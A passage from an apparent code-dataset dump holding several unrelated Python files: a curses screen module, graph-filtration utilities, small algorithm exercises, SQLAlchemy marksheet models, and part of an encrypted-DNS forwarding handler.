Screen:\n def __init__(self, screen) -> None:\n self.scr = screen\n self.scr.keypad(1)\n self.scr.notimeout(True)\n self.init_colors()\n\n def init_colors(self):\n CLR.set_colors()\n\n\nclass WindowManager:\n def __init__(self):\n self.maxy = curses.LINES - 1\n self.maxx = curses.COLS - 1\n\n def _update(self, dct):\n self.__dict__.update(dct)\n\n def add(self, **kwargs):\n for category in kwargs.keys():\n if category == 'standard':\n cls = Window\n elif category == 'message':\n cls = MessageWindow\n elif category == 'data':\n cls = DataWindow\n elif category == 'sequence':\n cls = SequenceWindow\n elif category == 'pattern':\n cls = PatternWindow\n\n for window_name, params in kwargs[category].items():\n pn = 'height', 'width', 'begin_y', 'begin_x', 'clr', 'hclr'\n separator = True if window_name \\\n in ['sequences', 'window2'] else False\n hide_empty = True if window_name == 'sequences' else False\n\n win = cls(\n **{name: params[num] for num, name in enumerate(pn)},\n hide_empty=hide_empty, separator=separator)\n self._update({window_name: win})\n\n def refresh_all(self):\n for name, object in self.__dict__.items():\n if hasattr(object, 'refresh'):\n object.get_data()\n object.refresh()\n\n\nclass Window:\n def __init__(\n self,\n scrollable=False, separator=False,\n **kwargs):\n self.win = curses.newwin(\n kwargs['height'], kwargs['width'],\n kwargs['begin_y'], kwargs['begin_x'])\n self.scrollable = scrollable\n self.separator = separator\n self.header = ''\n if scrollable:\n # self.win.setscrreg(0, 1)\n self.win.scrollok(True)\n self.win.leaveok(True)\n self.win.idlok(True)\n self.set_background(kwargs['clr'])\n self.active_line = 0\n self.active_row = 0\n self.height = kwargs['height']\n self.width = kwargs['width']\n self.clr = kwargs['clr']\n self.hclr = 
kwargs['hclr']\n\n def set_background(self, color_pair):\n self.win.bkgd(' ', curses.color_pair(color_pair))\n\n def focus(self, row=0):\n self.move(0, row)\n self.win.refresh()\n # curses.setsyx(1,0)\n # time.sleep(4)\n\n def focus_marker(self, y, x):\n self.move(y, x)\n self.print('[0', clr=3)\n self.win.refresh()\n\n def move(self, y, x):\n self.win.move(y, x)\n self.active_line = y\n self.active_row = x\n\n def move_pos_back(self):\n if self.active_row > 2:\n self.move(self.active_line, self.active_row-1)\n\n def backspace(self):\n self.move_pos_back()\n self.print(' ', end='')\n self.move_pos_back()\n\n def clear(self):\n self.win.erase()\n self.active_line = 0\n self.active_row = 0\n self.win.refresh()\n\n def write(self, char, move=True):\n self.win.addch(char)\n if move:\n self.active_row += 1\n self.win.refresh()\n\n def draw_separator(self):\n if self.separator:\n self.print('_' * (self.width), y=self.height - 2, end='')\n\n def parse_header(self):\n if '{' in self.header:\n hsplit = self.header.split('{')\n value = hsplit[1][:-1]\n ns, pr = value.split('.') if '.' in value else [value, '']\n return [hsplit[0], self.get_data_from_object(ns, pr)]\n else:\n return [self.header, '']\n\n def draw_header(self):\n key, value = self.parse_header()\n if value == {}:\n value = ''\n header = f' {key} {value}'\n self.print(header + ' ' * (self.width -\n len(header) - 4), clr=self.hclr)\n self.print('')\n\n def print(self, msg, end='\\n', x=0, y=0,\n pad=None, pad_chr=None, clr=0):\n clr = self.clr if clr == 0 else clr\n msg = str(msg)\n if x == 0 and y == 0:\n y = self.active_line\n x = self.active_row\n if y < 0 or y > curses.LINES or x < 0 or x > curses.COLS:\n return\n if x + len(msg) > curses.COLS:\n s = msg[:curses.COLS - x]\n else:\n s = msg\n if pad:\n ch = pad_chr or \" \"\n if pad is True:\n pad = curses.COLS # pad to edge of screen\n s += ch * (pad - x - len(msg))\n else:\n # pad to given length (or screen width)\n if x + pad > curses.COLS:\n pad = curses.COLS - x\n s += ch * (pad - len(msg))\n\n if not clr:\n clr = CLR.CLR_LOG1\n self.active_row += len(msg)\n maxy, maxx = self.win.getmaxyx()\n try:\n self.win.addstr(y, x, s, curses.color_pair(clr))\n except:\n logging.error('Curses Error while printing.')\n if self.active_line + 1 == maxy and self.height > 1:\n if self.scrollable:\n self.win.scroll()\n self.active_row = 0\n elif end == '\\n':\n self.active_line += 1\n self.active_row = 0\n self.win.move(self.active_line-1, 0)\n self.win.refresh()\n\n\nclass MessageWindow(Window):\n def __init__(self, **kwargs):\n super().__init__(**kwargs, scrollable=True)\n\n\nclass DataWindow(Window):\n def __init__(self, vertical=True, hide_empty=False, **kwargs):\n scrollable = True if vertical else False\n super().__init__(**kwargs, scrollable=scrollable)\n self.data = {}\n self.vertical = True if kwargs['height'] > 1 else False\n self.pending = False\n self.hide_empty = hide_empty\n self.cb_get_data = None\n\n def add_get_data_cb(self, object, namespace, prop):\n self.cb_get_data = [object, namespace, prop]\n\n def get_data_from_object(self, namespace, prop):\n data = {}\n if namespace == '':\n if hasattr(self.obj, prop):\n data = getattr(self.obj, prop)\n if callable(data):\n data = data()\n else:\n if hasattr(self.obj, namespace):\n sub = getattr(self.obj, namespace)\n if hasattr(sub, prop):\n data = getattr(sub, prop)\n return data\n\n def get_data(self):\n self.data = {}\n cb = self.cb_get_data\n if not cb:\n return False\n getter = cb[0]\n self.obj = getter()\n if cb and self.obj:\n 
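# cb holds (getter, namespace, prop); pull the attribute off the fresh object\n            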
self.data = self.get_data_from_object(cb[1], cb[2])\n\n def render_item(self, item):\n key, value = item\n if self.vertical:\n key = f'{key:02}' if type(key) is int \\\n else f'{str(key):9}'\n msg = f' {key}: {str(value)}'\n if not self.vertical and key == 'file':\n value = 'untitled' if not value else value\n msg = f' {str(value)} '\n msg = msg if self.vertical else f' {msg} '\n self.print(\n msg, end='\\n' if self.vertical else '')\n\n def refresh(self):\n self.clear()\n if self.header and self.vertical:\n self.draw_header()\n if self.data:\n for item in self.data.items():\n if not (item[1] == '' and self.hide_empty):\n self.render_item(item)\n self.draw_separator()\n\n\nclass SequenceWindow(DataWindow):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.data = {}\n\n def render_item(self, item):\n key, value = item\n grp = value['group']\n if not value['name']:\n return\n self.print(f'{key:02}: ', end='')\n clr = 20 + grp if grp and grp >= 0 and grp < 5 else 0\n self.print(value['name'], end='\\n', clr=clr)\n\n\nclass PatternWindow(DataWindow):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.data = {}\n self.cb_line_renderer = None\n\n def add_line_renderer(self, cb):\n self.cb_line_renderer = cb\n\n def refresh(self):\n if not self.data or not self.cb_line_renderer:\n return\n self.clear()\n if type(self.data) is list:\n for step in self.data:\n if len(step) > 1:\n repr = self.cb_line_renderer(step[1])\n else:\n repr = ''\n self.print(f'[{step[0]:02}] {repr}')\n","repo_name":"danielwine/zyntracker-utils","sub_path":"app/cli/screen.py","file_name":"screen.py","file_ext":"py","file_size_in_byte":8810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20218157488","text":"import numpy as np\nfrom os.path import expanduser, exists\nimport networkx as nx\nfrom warnings import warn\nimport pickle\nfrom joblib import Parallel, delayed\nfrom tqdm import tqdm\nfrom sklearn.preprocessing import LabelEncoder\nfrom scipy.spatial import distance_matrix\nfrom sklearn.base import BaseEstimator, TransformerMixin, clone\nimport multipers as mp\nfrom typing import Iterable\n\nDATASET_PATH=expanduser(\"~/Datasets/\")\n\n\ndef get(dataset:str, filtration:str):\n\tgraphs, labels = get_graphs(dataset)\n\ttry:\n\t\tfor g in graphs:\t\n\t\t\tfor node in g.nodes:\n\t\t\t\tg.nodes[node][filtration]\n\texcept:\n\t\tprint(f\"Filtration {filtration} not computed, trying to compute it ...\", flush=1)\n\t\tcompute_filtration(dataset, filtration)\n\treturn get_graphs(dataset)\n\n\n\ndef get_from_file_old(dataset:str, label=\"lb\"):\n\tfrom os import walk\n\tfrom scipy.io import loadmat\n\tfrom warnings import warn\n\tpath = DATASET_PATH + dataset +\"/mat/\"\n\tlabels:list[int] = []\n\tgs:list[nx.Graph] = []\n\tfor root, dir, files in walk(path):\n\t\tfor file in files:\n\t\t\tfile_ppties = file.split(\"_\")\n\t\t\tgid = file_ppties[5]\n\t\t\ti=0\n\t\t\twhile i+1 < len(file_ppties) and file_ppties[i] != label :\n\t\t\t\ti+=1\n\t\t\tif i+1 >= len(file_ppties):\n\t\t\t\twarn(f\"Cannot find label {label} on file {file}.\")\n\t\t\telse:\n\t\t\t\tlabels += [file_ppties[i+1]]\n\t\t\tadj_mat = np.array(loadmat(path + file)['A'], dtype=np.float32)\n\t\t\tgs.append(nx.Graph(adj_mat))\n\treturn gs, labels\n\n\ndef get_from_file(dataset:str):\n\tfrom os.path import expanduser, exists\n\tpath = DATASET_PATH + f\"{dataset}/{dataset[7:]}.\"\n\ttry:\n\t\tgraphs_ids = np.loadtxt(path+\"graph_idx\")\n\texcept:\n\t\treturn 
get_from_file_old(dataset=dataset)\n\tlabels:list[int] = LabelEncoder().fit_transform(np.loadtxt(path+\"graph_labels\"))\n\tedges = np.loadtxt(path+\"edges\", delimiter=',', dtype=int)-1\n\thas_intrinsic_filtration = exists(path+\"node_attrs\")\n\tgraphs:list[nx.Graph] = []\n\tif has_intrinsic_filtration:\n\t\tF = np.loadtxt(path+\"node_attrs\", delimiter=',')\n\tfor graph_id in tqdm(np.unique(graphs_ids), desc=\"Reading graphs from file\"):\n\t\tnodes, = np.where(graphs_ids == graph_id)\n\t\tdef graph_has_edge(u:int,v:int)->bool:\n\t\t\tif u in nodes or v in nodes:\n\t\t\t\tassert u in nodes and v in nodes, f\"Nodes {u} and {v} are not in the same graph\"\n\t\t\t\treturn True\n\t\t\treturn False\n\t\tgraph_edges = [(u,v) for u,v in edges if graph_has_edge(u,v)]\n\t\tg = nx.Graph(graph_edges)\n\t\tif has_intrinsic_filtration:\n\t\t\tnode_attrs = {node:F[node] for node in nodes}\n\t\t\tnx.set_node_attributes(g,node_attrs, \"intrinsic\")\n\t\tgraphs.append(g)\n\treturn graphs, labels\n\n\ndef get_graphs(dataset:str, N:int|str=\"\")->tuple[list[nx.Graph], list[int]]:\n\tgraphs_path = f\"{DATASET_PATH}{dataset}/graphs{N}.pkl\"\n\tlabels_path = f\"{DATASET_PATH}{dataset}/labels{N}.pkl\"\n\tif not exists(graphs_path) or not exists(labels_path):\n\t\tif dataset.startswith(\"3dshapes/\"):\n\t\t\treturn get_from_file_old(dataset,)\n\t\tgraphs, labels = get_from_file(dataset,)\n\t\tprint(\"Saving graphs at :\", graphs_path)\n\t\tset_graphs(graphs = graphs, labels = labels, dataset = dataset)\n\telse:\n\t\tgraphs = pickle.load(open(graphs_path, \"rb\"))\n\t\tlabels = pickle.load(open(labels_path, \"rb\"))\n\tfrom sklearn.preprocessing import LabelEncoder\n\treturn graphs, LabelEncoder().fit_transform(labels)\n\n\ndef set_graphs(graphs:list[nx.Graph], labels:list, dataset:str, N:int|str=\"\"): # saves graphs (and filtration values) into a file\n\tgraphs_path = f\"{DATASET_PATH}{dataset}/graphs{N}.pkl\"\n\tlabels_path = f\"{DATASET_PATH}{dataset}/labels{N}.pkl\"\n\tpickle.dump(graphs, open(graphs_path, \"wb\"))\n\tpickle.dump(labels, open(labels_path, \"wb\"))\n\treturn\n\ndef reset_graphs(dataset:str, N=None): # Resets filtrations values on graphs\n\tgraphs, labels = get_from_file(dataset)\n\tset_graphs(graphs,labels, dataset)\n\treturn\n\n\n\n\ndef compute_ricci(graphs:list[nx.Graph], alpha=0.5, progress = 1):\n\tfrom GraphRicciCurvature.OllivierRicci import OllivierRicci\n\tdef ricci(graph, alpha=alpha):\n\t\treturn OllivierRicci(graph,alpha=alpha).compute_ricci_curvature()\n\tgraphs = Parallel(n_jobs=1, prefer=\"threads\")(delayed(ricci)(g) for g in tqdm(graphs, disable = not progress, desc=\"Computing ricci\"))\n\treturn graphs\n\ndef compute_cc(graphs:list[nx.Graph], progress = 1):\n\tdef _cc(g):\n\t\tcc = nx.closeness_centrality(g)\n\t\tnx.set_node_attributes(g,cc,\"cc\")\n\t\tedges_cc = {(u,v):max(cc[u], cc[v]) for u,v in g.edges}\n\t\tnx.set_edge_attributes(g,edges_cc, \"cc\")\n\t\treturn g\n\tgraphs = Parallel(n_jobs=1, prefer=\"threads\")(delayed(_cc)(g) for g in tqdm(graphs, disable = not progress, desc=\"Computing cc\"))\n\treturn graphs\n\t# for g in tqdm(graphs, desc=\"Computing cc\"):\n\t# \t_cc(g)\n\t# return graphs\n\ndef compute_degree(graphs:list[nx.Graph], progress=1):\n\tdef _degree(g):\n\t\tdegrees = {i:1.1 if degree == 0 else 1 / degree for i, degree in g.degree}\n\t\tnx.set_node_attributes(g,degrees,\"degree\")\n\t\tedges_dg = {(u,v):max(degrees[u], degrees[v]) for u,v in g.edges}\n\t\tnx.set_edge_attributes(g,edges_dg, \"degree\")\n\t\treturn g\n\tgraphs = Parallel(n_jobs=1, 
prefer=\"threads\")(delayed(_degree)(g) for g in tqdm(graphs, disable = not progress, desc=\"Computing degree\"))\n\treturn graphs\n\t# for g in tqdm(graphs, desc=\"Computing degree\"):\n\t# \t_degree(g)\n\t# return graphs\n\ndef compute_fiedler(graphs:list[nx.Graph], progress = 1): # TODO : make it compatible with non-connexe graphs\n\tdef _fiedler(g):\n\t\tconnected_graphs = [nx.subgraph(g, nodes) for nodes in nx.connected_components(g)]\n\t\tfiedler_vectors = [nx.fiedler_vector(g)**2 if g.number_of_nodes() > 2 else np.zeros(g.number_of_nodes()) for g in connected_graphs] # order of nx.fiedler_vector correspond to nx.laplacian -> g.nodes\n\t\t# print(len(fiedler_vectors))\n\t\t\n\t\tfiedler_dict = {\n\t\t\tnode:fiedler_vector[node_index]\n\t\t\tfor g,fiedler_vector in zip(connected_graphs, fiedler_vectors)\n\t\t\tfor node_index,node in enumerate(list(g.nodes))\n\t\t}\n\t\tnx.set_node_attributes(g,fiedler_dict,\"fiedler\")\n\t\tedges_fiedler = {(u,v):max(fiedler_dict[u], fiedler_dict[v]) for u,v in g.edges}\n\t\tnx.set_edge_attributes(g,edges_fiedler, \"fiedler\")\n\t\treturn g\n\tgraphs = Parallel(n_jobs=1, prefer=\"threads\")(delayed(_fiedler)(g) for g in tqdm(graphs, disable = not progress, desc=\"Computing fiedler\"))\n\treturn graphs\n\t# for g in tqdm(graphs, desc=\"Computing fiedler\"):\n\t# \t_fiedler(g)\n\t# return graphs\n\ndef compute_hks(graphs:list[nx.Graph],t:float, progress = 1):\n\tdef _hks(g:nx.Graph):\n\t\tw, vps = np.linalg.eig(nx.laplacianmatrix.normalized_laplacian_matrix(g, nodelist=g.nodes()).toarray()) # order is given by g.nodes order\n\t\tw = w.view(dtype=float)\n\t\tvps= vps.view(dtype=float)\n\t\tnode_hks = {node:np.sum(np.exp(-t*w)*np.square(vps[node_index,:])) for node_index,node in enumerate(g.nodes)}\n\t\tnx.set_node_attributes(g, node_hks, f\"hks_{t}\")\n\t\tedges_hks = {(u,v):max(node_hks[u], node_hks[v]) for u,v in g.edges}\n\t\tnx.set_edge_attributes(g,edges_hks, f\"hks_{t}\")\n\t\treturn g\n\tgraphs = Parallel(n_jobs=1, prefer=\"threads\")(delayed(_hks)(g) for g in tqdm(graphs, disable = not progress, desc=f\"Computing hks_{t}\"))\n\treturn graphs\n\ndef compute_geodesic(graphs:list[nx.Graph], progress=1):\n\tdef _f(g:nx.Graph):\n\t\ttry:\n\t\t\tnodes_intrinsic = {i:n[\"intrinsic\"] for i,n in g.nodes.data()}\n\t\texcept:\n\t\t\twarn(\"This graph doesn't have an intrinsic filtration, will use 0 instead ...\")\n\t\t\tnodes_intrinsic = {i:0 for i,n in g.nodes.data()}\n\t\t\t# return g\n\t\tnode_geodesic = {i:0 for i in g.nodes}\n\t\tnx.set_node_attributes(g, node_geodesic, f\"geodesic\")\n\t\tedges_geodesic = {(u,v):np.linalg.norm(nodes_intrinsic[u] - nodes_intrinsic[v]) for u,v in g.edges}\n\t\tnx.set_edge_attributes(g,edges_geodesic, f\"geodesic\")\n\t\treturn g \n\tgraphs = Parallel(n_jobs=1, prefer=\"threads\")(delayed(_f)(g) for g in tqdm(graphs, disable = not progress, desc=f\"Computing geodesic distances on graphs\"))\n\treturn graphs\n\ndef compute_filtration(dataset:str, filtration:str, **kwargs):\n\tif filtration == \"ALL\":\n\t\t# reset_graphs(dataset) # not necessary\n\t\tgraphs,labels = get_graphs(dataset, **kwargs)\n\t\tgraphs = compute_geodesic(graphs)\n\t\tgraphs = compute_cc(graphs)\n\t\tgraphs = compute_degree(graphs)\n\t\tgraphs = compute_ricci(graphs)\n\t\tgraphs = compute_fiedler(graphs)\n\t\tgraphs = compute_hks(graphs, 10)\n\t\tset_graphs(graphs=graphs, labels=labels, dataset=dataset)\n\t\treturn\n\tgraphs,labels = get_graphs(dataset, **kwargs)\n\tif filtration == \"dijkstra\":\n\t\treturn\n\telif filtration == \"cc\":\n\t\tgraphs 
= compute_cc(graphs)\n\telif filtration == \"degree\":\n\t\tgraphs = compute_degree(graphs)\n\telif filtration == \"ricciCurvature\":\n\t\tgraphs = compute_ricci(graphs)\n\telif filtration == \"fiedler\":\n\t\tgraphs = compute_fiedler(graphs)\n\telif filtration == \"geodesic\":\n\t\tgraphs = compute_geodesic(graphs)\n\telif filtration.startswith('hks_'):\n\t\tt = int(filtration[4:]) # don't want to deal with floats, makes dots in title...\n\t\tgraphs = compute_hks(graphs=graphs, t=t)\n\telse:\n\t\twarn(f\"Filtration {filtration} not implemented !\")\n\t\treturn\n\tset_graphs(graphs=graphs, labels=labels, dataset=dataset)\n\treturn\n\n\n\nclass Graph2SimplexTree(BaseEstimator,TransformerMixin):\n\t\"\"\"\n\tTransforms a list of networkx graphs into a list of simplextree multi\n\t\n\tUsual Filtrations\n\t-----------------\n\t- \"cc\" closeness centrality\n\t- \"geodesic\" if the graph provides data to compute it, e.g., BZR, COX2, PROTEINS\n\t- \"degree\" \n\t- \"ricciCurvature\" the ricci curvature\n\t- \"fiedler\" the square of the fiedler vector\n\t\"\"\"\n\tdef __init__(self, filtrations:Iterable[str]=[\"ricciCurvature\", \"cc\", \"degree\"], delayed=False, num_collapses=100, progress:bool=False):\n\t\tsuper().__init__()\n\t\tself.filtrations=filtrations # filtration to search in graph\n\t\tself.delayed = delayed # if True, return joblib-delayed tasks instead of computing now #TODO\n\t\tself.num_collapses=num_collapses\n\t\tself.progress=progress\n\tdef fit(self, X, y=None):\n\t\treturn self\n\tdef transform(self,X:list[nx.Graph]):\n\t\tdef todo(graph, filtrations=self.filtrations) -> mp.SimplexTreeMulti: \n\t\t\tst = mp.SimplexTreeMulti(num_parameters=len(filtrations))\n\t\t\tnodes = np.asarray(graph.nodes, dtype=int).reshape(1,-1)\n\t\t\tnodes_filtrations = np.asarray([[graph.nodes[node][filtration] for filtration in filtrations] for node in graph.nodes], dtype=np.float32)\n\t\t\tst.insert_batch(nodes, nodes_filtrations)\n\t\t\tedges = np.asarray(graph.edges, dtype=int).T\n\t\t\tedges_filtrations = np.asarray([[graph[u][v][filtration] for filtration in filtrations] for u,v in graph.edges], dtype=np.float32)\n\t\t\tst.insert_batch(edges,edges_filtrations)\n\t\t\tif st.num_parameters == 2:\tst.collapse_edges(num=self.num_collapses) # TODO : wait for a filtration domination update\n\t\t\tst.make_filtration_non_decreasing() ## Ricci is not safe ...\n\t\t\treturn st\n\t\treturn [delayed(todo)(graph) for graph in X] if self.delayed else Parallel(n_jobs=-1, prefer=\"threads\")(delayed(todo)(graph) for graph in tqdm(X, desc=\"Computing simplextrees from graphs\", disable=not self.progress))","repo_name":"DavidLapous/multipers-signed-measure","sub_path":"multipers/data/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":10651,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"}
+{"seq_id":"32067938358","text":"\n# MINIMUM INTERVAL PARTITIONING\n\n# is the interval set M compatible?\n# for every i,j with i!=j in M the following must hold: \n# si >= fj or sj >= fi \ndef compatible(L,M):\n    for i in M:\n        for j in M:\n            if i != j:\n                (si, fi) = L[i]\n                (sj, fj) = L[j]\n                if (not si >= fj) and (not sj >= fi):\n                    return False\n    return True\n\n# Example\nL = [(0,3),(0,4),(4,6),(5,7),(8,10),(0,12),(9,13),(15,16),(14,17)]\n# print(compatible(L,{0,2,5}))\n# print(compatible(L,{0,3,4,7}))\n# print(compatible(L,{1,2}))\n# print(compatible(L,set()))\n
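# e.g. compatible(L,{0,3,4,7}) is True: those four intervals are pairwise\n# non-overlapping, while compatible(L,{0,2,5}) is False because (0,3) and\n# (0,12) overlap.\n\n\n\n# feasible solution:\n# - r is always total\n# - each interval set per resource is compatible\ndef sol_min_intpart(L,r):\n    m = len(L)\n    R = 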
[set() for _ in range(m)]\n\n    for i in range(m):\n        R[r(i)].add(i)\n\n    for ressource in R:\n        if not compatible(L, ressource):\n            return False\n\n    return True\n\n# objective function:\n# - cardinality of the range of r\ndef m_min_intpart(L,r):\n    m = len(L)\n    R = [set() for _ in range(m)]\n    value = 0\n\n    for i in range(m):\n        R[r(i)].add(i)\n\n    for ressource in R:\n        if ressource != set():\n            value += 1\n\n    return value\n\n# design pattern: exhaustive search\nfrom itertools import product\n\n# returns a function that assigns each interval i to a\n# resource\ndef def_r(t):\n    def r(i):\n        return t[i]\n    return r\n\n\ndef min_intpart_exhaustive(L):\n    m = len(L)\n    opt = m\n    r_opt = None\n\n    # Build every possible function r and keep the one\n    # with the smallest range\n    for t in product([i for i in range(m)], repeat=m):\n        r = def_r(t)\n        if sol_min_intpart(L, r): # if the solution is feasible (intervals per resource are compatible)\n            deg = m_min_intpart(L,r)\n            if deg < opt: # compare the range of r with the range of the best solution so far\n                opt = deg\n                r_opt = r # optimal function \n\n    return opt\n\n\nprint(\"Optimal number of resources: \", min_intpart_exhaustive([(0,2),(1,3),(0,3),(2,4)]))\nprint(\"Optimal number of resources: \", min_intpart_exhaustive([(0,2),(0,3),(2,3),(3,4),(2,4),(4,7)]))\n\n\n\n","repo_name":"MMueller98/Algorithmen-Design-Python","sub_path":"Code/ueb/d/stub_aufg01_min_intpart_exh.py","file_name":"stub_aufg01_min_intpart_exh.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"657677229","text":"from collections import deque\n\ndi = [0, 0, 1, -1]\ndj = [1, -1, 0, 0]\n\n\ndef get_graph(v):\n    n = len(v)\n    m = len(v[0])\n    graph = [[] for _ in range(n * m)]\n\n    for i in range(n):\n        for j in range(m):\n            if v[i][j] == 0:\n                continue\n            for d in range(4):\n                if 0 <= i + di[d] < n and 0 <= j + dj[d] < m and v[i + di[d]][j + dj[d]] != 0:\n                    graph[(i * m) + j].append((i + di[d]) * m + j + dj[d])\n\n    return graph\n\n\ndef bfs(visited, graph, i):\n    queue = deque([i])\n    visited[i] = True\n    result = 0\n\n    while queue:\n        curr = queue.popleft()\n        result += 1\n        for next in graph[curr]:\n            if next != [-1] and not visited[next]:\n                queue.append(next)\n                visited[next] = True\n    return result\n\n\ndef connected_component(graph, field):\n    visited = [False] * len(graph)\n    result = []\n\n    for i in range(len(graph)):\n        length = len(field[0])\n        n_i = i // length\n        n_j = i % length\n        k = field[n_i][n_j]\n        if visited[i] or k != 1:\n            continue\n        result.append(bfs(visited, graph, i))\n\n    if len(result) == 0:\n        return [0, 0]\n    else:\n        return [len(result), max(result)]\n\n\ndef solution(v):\n    graph = get_graph(v)\n    result = connected_component(graph, v)\n    return result\n\nv = [[0]]\nprint(solution(v))","repo_name":"skfo763/Problem_Solving","sub_path":"test_job/test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"18432296081","text":"def bubbleSort(arr):\n    n = len(arr)\n\n    # traverse all array elements\n    for i in range(n):\n\n        # Last i elements are already in place\n        for j in range(0, n - i - 1):\n\n            if arr[j] > arr[j + 1]:\n                arr[j], arr[j + 1] = arr[j + 1], arr[j]\n\n\narr = [64, 34, 25, 12, 22, 11, 90]\n\nbubbleSort(arr)\n\nprint(\"Sorted array:\")\nfor i in range(len(arr)):\n    print(\"%d\" % arr[i])
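\n# Note: this is the plain O(n^2) bubble sort; a common variant stops early\n# when an entire inner pass performs no swaps.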
","repo_name":"liukanshan1/Notes","sub_path":"Python/冒泡排序.py","file_name":"冒泡排序.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"}
+{"seq_id":"70860034474","text":"def history(name, episode):\n    with open('history.txt', 'a') as f:\n        f.write(f'{name}-{episode}\\n')\n\n\ndef retrieve_history():\n\n    with open('history.txt', 'r') as f:\n        history = f.read().split()\n        history = list(dict.fromkeys(history))\n\n    for index, hist in enumerate(history):\n        print(f'[{index+1}] {hist}')\n    print('[q] Quit')\n\n    while True:\n        history_episode = input('> ')\n\n        try:\n            if history_episode == 'q':\n                exit()\n            elif int(history_episode) == 1:\n                name = history[0]\n                break\n            elif int(history_episode) > 1:\n                try:\n                    name = history[int(history_episode)-1]\n                    break\n                except IndexError:\n                    print('Out of range...')\n        except ValueError:\n            print('Try \"q\" to quit')\n\n    anime_name = name.replace('episode', '').replace('-', ' ').split()\n    anime_epi = anime_name.pop()\n    anime_name = ' '.join(anime_name)\n    return anime_name, anime_epi\n","repo_name":"C0DE-SLAYER/CliAniVerse","sub_path":"CliAniVerse/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
+{"seq_id":"23083642324","text":"S = input()\nres = 0\nf = True\nN = len(S)\nfor i in range(0, N - 1, 2):\n    opr = int(S[i])\n    op = S[i + 1]\n    if op == '+':\n        res += int(opr > 0 and f)\n        f = True\n    else:\n        f &= opr > 0\nres += int(int(S[N - 1]) > 0 and f)\nprint(res)\n","repo_name":"e5pe0n/algorithm-training","sub_path":"AtCoder/Browns/python/ABC033-C-Sushiki_no_Kakikae.py","file_name":"ABC033-C-Sushiki_no_Kakikae.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"71401670632","text":"from sqlalchemy import Column, Integer, String, ForeignKey\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship\n\nfrom logger import logger\n\nBase = declarative_base()\n\n\n\nclass Marksheet(Base):\n    \"\"\"\n    Marksheet of students\n    \"\"\"\n    try:\n        __tablename__ = 'marksheet' # Name of the table\n        roll_id = Column(Integer, primary_key=True, unique=True) # primary Key attribute\n        name = Column(String)\n        History = Column(Integer)\n        Maths = Column(Integer)\n        Science = Column(Integer)\n        activity = relationship(\"Activities\", back_populates=\"marksheets\")\n    except Exception as e:\n        logger.exception(e)\n\n    def __repr__(self):\n        return \"<Marksheet(roll_id='{}', name='{}', History='{}', Maths='{}', Science='{}')>\" \\\n            .format(self.roll_id, self.name, self.History, self.Maths, self.Science)\n\n\n
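# One Marksheet row can relate to many Activities rows through the roll_id\n# foreign key; relationship() on each class exposes the link in both directions.\n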
self.sports))\n","repo_name":"amitkrmaharana/Report_Card","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13229397785","text":"import concurrent.futures\nimport random\nimport time\n\nimport dns.dnssec\nimport dns.edns\nimport dns.flags\nimport dns.message\nimport dns.rdatatype\n\nimport encrypted_dns.outbound\n\n\nclass OutboundHandler:\n @staticmethod\n def get_group(query_name, domain_group, tag_group, rules=None):\n tag = encrypted_dns.utils.parse_domain_rules(domain_group, query_name, default='bootstrap')\n return tag_group[tag], tag_group[tag].get('concurrent', False)\n\n @staticmethod\n def random_outbound(outbounds):\n \"\"\"Get a random outbound from the list of outbounds specified in config.json.\n\n :param outbounds: List of outbounds.\n :return: Dictionary of outbound and type of outbound\n \"\"\"\n population = []\n for outbound in outbounds['dns']:\n population.append(outbound)\n return random.choice(population)\n\n @staticmethod\n def resolve_outbound_ip(outbound_address, bootstrap_dns_ip, hosts_dict):\n \"\"\"Resolve ip address of HTTPS or TLS outbound with bootstrap dns address.\n\n :param hosts_dict: Dict of hosts to resolve IP address.\n :param outbound_address: Domain name of HTTPS or TLS outbound\n :param bootstrap_dns_ip: DNS server for resolving 'outbound_address'\n :return: RRSet Answer of HTTPS or TLS outbound\n \"\"\"\n if outbound_address in hosts_dict:\n return hosts_dict[outbound_address]\n dns_query = dns.message.make_query(outbound_address, dns.rdatatype.A)\n response = dns.query.udp(dns_query, bootstrap_dns_ip)\n if response.answer:\n return response.answer[-1].items[0].to_text()\n\n\nclass WireMessageHandler:\n def __init__(self, outbounds, cache_object, ecs_ip_address, hosts, dnssec, firewall):\n self.cache = cache_object\n self.ecs_ip_address = ecs_ip_address\n self.hosts = hosts\n self.dnssec = dnssec\n self.firewall = firewall\n self.rate_per_second = [0, int(time.time())]\n\n # map protocol of outbound to the method for resolve\n self.protocol_methods = {\n 'udp': WireMessageHandler._udp_resolve,\n 'tcp': WireMessageHandler._tcp_resolve,\n 'tls': WireMessageHandler._tls_resolve,\n 'dot': WireMessageHandler._tls_resolve,\n 'https': WireMessageHandler._https_resolve,\n 'doh': WireMessageHandler._https_resolve,\n }\n\n self.tag_group = {} # tag to group dict\n self.domain_group = {} # domain to tag\n for dns_group in outbounds:\n self.tag_group[dns_group['tag']] = dns_group\n for domain in dns_group.get('domains', {}):\n self.domain_group[domain] = dns_group['tag']\n\n @staticmethod\n def edns_subnet_client(query_message, ip):\n \"\"\"Add edns subnet client option to query messages.\n\n :param query_message: DNS query message for processing.\n :param ip: IP Address to add as an option.\n :return: Processed DNS query message.\n \"\"\"\n if ip != '' and ip is not None:\n query_message.use_edns(0, 0, options=[dns.edns.ECSOption(ip)])\n\n def 